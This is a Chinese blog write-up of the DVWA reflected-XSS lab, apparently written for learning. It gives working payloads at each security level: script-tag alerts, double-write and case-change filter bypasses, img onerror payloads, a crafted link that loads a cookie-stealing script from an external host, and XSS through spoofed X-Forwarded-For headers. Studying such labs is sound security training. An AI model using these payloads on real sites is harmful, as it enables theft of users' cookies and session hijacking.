XSS(Reflected)
XSS(Reflected)
前言
前面已经对xss存储型进行了练习,有了初步的认识
这里结合dvwa靶场对xss反射型漏洞来进行一个初步的学习
练习
Low
进入xss反射型练习,可以看到这里是我们输入什么后,下面就会输出Hello+我们的输入
OK,直接来试下<script>alert(1)</script>
可以看到1成功弹出,说明存在很简单(没有任何防护)的xss漏洞
再试下我们的xss平台的payload(不知道XSS平台请看前面的xss(stored)这篇文章)
可以看到成功返回,因为这是get方式的请求
所以我们可以制造下面的链接,用csrf中用过的方法诱使别人去访问从而获得信息
http://192.168.2.123:8325/vulnerabilities/xss_r/?name=<script+src%3D"http%3A%2F%2F192.168.99.100%2Fmyjs%2Fcookie.js"><%2Fscript>#
Medium
这里和存储型一样也是黑名单机制,也是过滤了<script>
双写绕过
<scri<script>pt>
这里它要替换的是<script>所以只用在头部双写就行
亲测alert和xss平台payload可行
大写绕过
因为只替换<script>所以我们将里面任一字母大写都能绕过…
亲测alert和xss平台payload可行
High
这里和存储型的防护方式都是一样的,这里严格限制了<script>标签
但是img,body,iframe等标签都还是可以用的…
可以看到用<img src=1 οnerrοr=alert(1)>作为输入后成功弹窗
TIPS
前面在xss存储型说的如何在img标签中插入我们的xss平台payload我终于找到了
参考:XSS的原理分析与解剖
上面的博客写的真的不错很适合入门,里面的例子自己都可以手动自己过一遍
img带xss payload语句:
<img src=x οnerrοr=appendChild(createElement(‘script’)).src=‘js_url’ />
然后亲测xss存储型low和medium级别都没问题,high会过滤script关键字还是不行…
当然反射型也一样low和medium级别都可行,但high级别不行,期待大佬的帮助ing…
一点分享,关于客户端ip的修改,刚好前面菜鸟级ctf时遇到过,看大佬的文章发现还有插件可以用,正好分享下
我们都知道当你浏览网站的时候,对方的服务器会记录下你的IP地址。如果我们伪造IP为XSS代码呢?这里说的修改IP为XSS不是说修改PC端的,而是在浏览器也就是网页上的客户端进行修改。
这里需要使用firefox浏览器和两个附件
附件一:X-Forwarded-For Header
因为PHP获取IP有3个函数。而X-Forwarded-For Header就是对其中一个函数X_FORWARDED_FOR起作用,X_FORWARDED_FOR有个缺陷可以使客户端伪造任意IP,当然包括字符串,但是对其他两个函数就不行了。
附件二:Modify Headers
Modify Headers可以伪造数据包内容,当然也可以伪造HTTP_CLIENT_IP来更改IP。
那还有一个REMOTE_ADDR获取IP函数,这个怎么修改呢?答案是无法修改。
REMOTE_ADDR是由 nginx 传递给 php 的参数,所以就是当前 nginx 直接通信的客户端的 IP ,而我们无法插手。所以一旦对方使用了REMOTE_ADDR函数来获取IP,那就没办法了。不过不要紧,一共3个函数,2个函数可以伪造,我们还是有很大的成功率的
但文章中大佬用的插件在新版的火狐已经没有了,现在的插件不支持非法ip(也就是xss)了,大佬文章中的利用X_FORWARDED_FOR的xss漏洞没法感受了…但这个漏洞主要是会显示你登录ip的网站才可能存在…
总结
反射型xss,其实练习完就能感受到比起存储型xss,利用起来要困难很多
反射型不像存储型会存储在网站上,当别人来访问时就会执行,这里需要我们自己来构造链接诱使用户点击,这比起存储型xss就明显复杂很多,存储xss,类似留言板我们把xss payload仍上去后不用管,只要不被删,用户的信息就会往我们的xss平台上发了…
所以说反射型和存储型在找漏洞的时候就是不一样的,反射型就需要见框就插,这也正是前面做菜鸟级ctf题时遇到输入框的题目没有想到xss漏洞,当时只学习了存储型xss所以认识就很片面…
手工的话,记住一句话“见框就插、改数据包不可见部分、改URL参数、js分析”就可以了。改数据包、js分析比较深,现在我就不再阐述了,见框就插,大家应该都明白,找到一个input输入框,先输入唯一字符串,然后看源代码里有没有出现,再输入<>""/&()来看看过滤了哪些字符,根据过滤的字符,来构造xss
上面是大佬对反射型xss挖洞的总结,真的觉得说的很好,有种逻辑理顺了的感觉
XSS的原理分析与解剖(第二篇)
参考
新手指南:DVWA-1.9全级别教程之CSRF
XSS的原理分析与解剖
XSS的原理分析与解剖(第二篇)
XSS(Reflected)相关推荐
- xss/reflected/default
本文章向大家介绍xSS-Reflected,主要包括xSS-Reflected使用实例.应用技巧.基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下.反射型 XSS (Refle ...
- DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面.特点:弹窗警告.广告:javas ...
- PHP代码审计DVWA[XSS (Reflected)]
XSS (Reflected)反射型XSS 靶场搭建可用蓝易云服务器
- DVWA之XSS (Reflected)
XSS,全称Cross Site Scripting,即跨站脚本攻击,也相当于是一种代码注入攻击,hacker在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行(这里要说明下 ...
- XSS Reflected 测试
前言 由于最近在做XSS方面的测试,于是找到了DVWA平台进行实验测试,通过这三篇文章让大家了解XSS方面的大概内容,这三篇文章只是把你领进XSS的大门,要想真正深入的学习XSS,你还需要去学习很多东 ...
- DVWA 反射型XSS XSS(Reflected)题解
low 首先输入最基础的 <script>alert("1")</script> 发现弹窗成功. 重置数据库,试一下能不能爆出cookie. <scr ...
- DVWA靶机-反射性XSS漏洞(Reflected)
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command I ...
- DVWA1.9平台XSS小结
LOW级别就不写了...... 直接上中高级别(结合源码更好理解) 1.XSS Reflected(Medium) 从源码中可以清楚的看到,输入的<script>标签被过滤掉了,看清了,只 ...
- ajax在Xss中的利用,XSS高级利用
点击阅读 利用 xss 的 javascript 劫持 一个 xss 漏洞示例页面 1 2 3 4 5 6 7 8 9 10 $xss = @$_GET['xss']; if($xss!==null) ...
最新文章
- linux打开ftp功能的方法
- 吴恩达神经网络1-2-2_图神经网络进行药物发现-第1部分
- scala 判断字段 是不是 日期类型_举个栗子!Tableau 技巧(147):使用 动态参数 筛选到最新日期值...
- mysql关闭显示无权限_如何关闭mysql远程登录权限
- 初学django框架
- git pull没有更新成功_git冲突平滑解决的巧方法
- anaconda利用sns或plt画图中文乱码问题
- JavaScript第6章上机练习2(使用jQuery美化英雄联盟简介页)上机练习3(制作非缘勿扰页面特效)
- sql分组排序, 分页查询
- ubuntu 下的限速软件 wondershaper 以及 命令行测试网速
- n1怎么进入线刷模式_中国移动N1 M821线刷刷机教程_移动M821线刷包_救砖包
- 闲置商标转让怎样管理最好?
- 黑客长期摇号不中黑掉北京小客车摇号网
- 嵌套在iframe页面打印去掉页眉页尾
- 25款操作系统全面接触 [8]
- Pathon简介和优势
- 微星超龙显卡的性能模式无法开机的原因与解决办法
- 利用jpedal进行pdf转换成jpeg,jpg,png,tiff,tif等格式的图片
- 四大机器学习降维算法:PCA、LDA、LLE、Laplacian Eigenmaps
- 《沉思录卷十》幸福就是按照本性生活